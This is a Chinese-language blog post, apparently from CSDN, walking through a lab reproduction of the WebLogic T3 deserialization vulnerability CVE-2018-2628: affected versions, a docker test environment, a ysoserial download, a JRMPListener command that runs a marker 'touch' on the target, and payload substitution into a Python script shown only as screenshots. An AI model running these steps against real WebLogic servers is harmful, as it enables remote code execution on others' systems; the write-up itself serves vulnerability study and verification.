weblogic 关闭t3协议_【漏洞复现】Weblogic反序列化漏洞(CVE-2018-2628)

6b019c499218594be0648e613e43ca4c.png

漏洞描述:

Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端口的应用上默认开启. 攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击。

影响版本:

Oracle Weblogic Server10.3.6.0.0

Oracle Weblogic Server12.1.3.0.0

Oracle Weblogic Server12.2.1.2.0

Oracle Weblogic Server12.2.1.3.0

复现步骤:

1. 启动漏洞环境

命令:docker-compose up -d

c91ffe1b337fb8af1dc953c2ae41d93b.png

2. 下载反序列化工具

命令:wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar

49a240752bbf01bfa1e80d4e862e4cd2.png

3. 启动JRMP Server,利用监听在连接成功后靶机上创建jadoreshell

命令:java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 8889 Jdk7u21 "touch /tmp/jadoreshell"

dc72981933f1be5876531c788a5c376a.png

4. 使用ysoserial-0.1-cve-2018-2628-all.jar工具生成一个payload字符串,因为要实现Weblogic远程调用攻击机主机上的方法。就需要知道远程方法所在的主机地址和端口号。所以在上一步要记录攻击主机的信息。

d4471679ea4e17344261ee3c0e1e1b80.png

5. 替换脚本里的payload以及目标IP地址

fceef61d008a27ffdac6d2a07fd1d417.png

9fd74479c1a6fb736d8511ada33bbcdc.png

6. 执行python脚本

002b889a64c38f3e00b818d8c8514b28.png

ccc6138f23945df7dac0e6871e74077c.png

7. 查看是否写入文本文件

命令:dockers ps

2be87eb89551e5e09b88e7640cec642a.png
命令:docker exec -ti cve-2018-2628_weblogic_1 /bin/bash
命令:ls -al /tmp 

d8d31a5c2e788a64c38a6858eb3af42b.png

文件写入成功

产品解决与支持:

华云安灵洞®威胁与漏洞管理平台(Ai.Vul)已经支持一键检测该漏洞。

9704dd40a3212ffde1f1d069a99dc17e.png

984e6923caab3426c19b30023442a672.png
表情包
插入表情
评论将由博主筛选后显示,对所有人可见 | 还能输入1000个字符
相关推荐
©️2020 CSDN 皮肤主题: 数字20 设计师:CSDN官方博客 返回首页